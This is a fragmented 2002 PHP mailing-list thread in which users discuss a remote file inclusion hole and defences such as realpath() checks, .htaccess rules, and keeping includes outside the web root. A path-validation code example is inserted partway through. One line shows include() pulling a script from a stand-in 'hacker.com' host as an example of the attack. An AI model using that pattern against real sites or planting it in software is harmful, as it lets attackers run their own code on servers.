Use realpath() to check the path. I also suspect your script is
vulnerable to cross-site includes (include('http://hacker.com/script.inc');)
Rick Beckman wrote:
Okay, I was mistaken... There is a gaping security hole in my simple li'l
script... How do I modify it to only accept files from a
erm.. would that allow hackers access? Say I have a database include file,
would hackers be able to get access to my database like this?
(include('http://mysite.com/datainc.php');)
I hope bloody not!!! If so, how on earth do I get round that!
John
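One way to implement the realpath() check suggested above, as an added example rather than code from the thread; the ./inc/ directory, the page names and PHP 7+ are assumptions:

```php
<?php
// Added example (not code from the thread): validate a user-supplied include
// name with realpath() before calling include(), as suggested above.
// Assumes PHP 7+ and a hypothetical ./inc/ directory holding *.inc files.

// Return the absolute path of $name inside $baseDir, or null when the name
// is not a plain file name, does not exist, or resolves outside $baseDir
// (URLs, ../ traversal, absolute paths and symlinks all end up here).
function safe_include_path(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false || !preg_match('/^[A-Za-z0-9_-]+\.inc$/', $name)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false) {
        return null;
    }
    // realpath() has resolved symlinks; require the result to stay under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// An allow-list of the names the application actually ships is the
// strongest check; the path test above guards against mistakes in it.
const ALLOWED_PAGES = ['header.inc', 'footer.inc', 'news.inc'];   // assumed names

function include_page(string $baseDir, string $requested): bool
{
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return false;
    }
    $path = safe_include_path($baseDir, $requested);
    if ($path === null) {
        return false;
    }
    include $path;
    return true;
}

// Usage (constructed): $_GET['page'] is untrusted. 'news.inc' is included from
// ./inc/news.inc; 'http://example.invalid/x.inc' or '../datainc.php' are refused.
$page = $_GET['page'] ?? 'news.inc';
if (!include_page(__DIR__ . '/inc', $page)) {
    http_response_code(404);
}
```

Keeping the include directory outside the web root, as the thread goes on to recommend, means the allow-listed files are never served directly even if the .htaccess rule is lost.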
On Friday 04 Oct 2002 10:52 am, Marek
all my include files are *.inc, and I have a .htaccess file that makes
apache refuse to serve those files directly thru http.
Justin
on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:
erm.. would that allow hackers access? Say I have a database include file
would hackers be able
so as my files are all .php I would be okay from an external hacking attempt?
I don't have any worry about internal as I am on a dedicated server
John
On Friday 04 Oct 2002 11:02 am, Justin French wrote:
all my include files are *.inc, and I have a .htaccess file that makes
apache refuse to
That would not help you if you include files based on unchecked user input.
Justin French wrote:
all my include files are *.inc, and I have a .htaccess file that makes
apache refuse to serve those files directly thru http.
Justin
on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:
To: PHP [EMAIL PROTECTED]
Sent: Friday, October 04, 2002 10:58 AM
Subject: Re: [PHP] Umm... Uh-oh
erm.. would that allow hackers access? Say I have a database include file
would hackers be able to get access to my database like this?
(include('http://mysite.com/datainc.php');)
I hope bloody
, but NOT accessible via http.
HTH, Stas
- Original Message -
From: John Wards [EMAIL PROTECTED]
To: PHP [EMAIL PROTECTED]
Sent: Friday, October 04, 2002 10:58 AM
Subject: Re: [PHP] Umm... Uh-oh
erm.. would that allow hackers access? Say I have a database include file
would hackers be able to get
Sent: Friday, October 04, 2002 6:14 AM
To: Stas Maximov
Cc: PHP General
Subject: Re: [PHP] Umm... Uh-oh
ah never thought of that!
John
On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote:
The easiest and safest way to get around this problem is to place
all
your